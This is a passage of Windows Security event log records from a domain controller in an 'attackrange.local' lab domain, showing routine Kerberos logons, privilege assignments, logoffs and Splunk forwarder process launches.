Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B505A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264101
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B505A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264100
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B4F6C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51847
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:49:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264099
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B4F6C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264111
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x98c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264110
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xee0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:49:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264112
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aa4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:49:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264113
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x118c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:49:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264114
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1808
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:49:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264116
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:49:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264115
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:49:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264117
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B5114
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:49:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264120
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B8A3A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:49:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264119
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B8A3A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51860
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:49:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264118
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B8A3A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:50:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264122
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe88
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:50:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264121
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x5fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:50:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264123
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x142c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:50:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264124
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1260
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:50:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264125
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a14
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:50:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264127
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:50:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264126
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a30
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:50:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264130
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7BC40D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:50:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264129
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7BC40D
Linked Logon ID: 0x0
Network Account Name: -
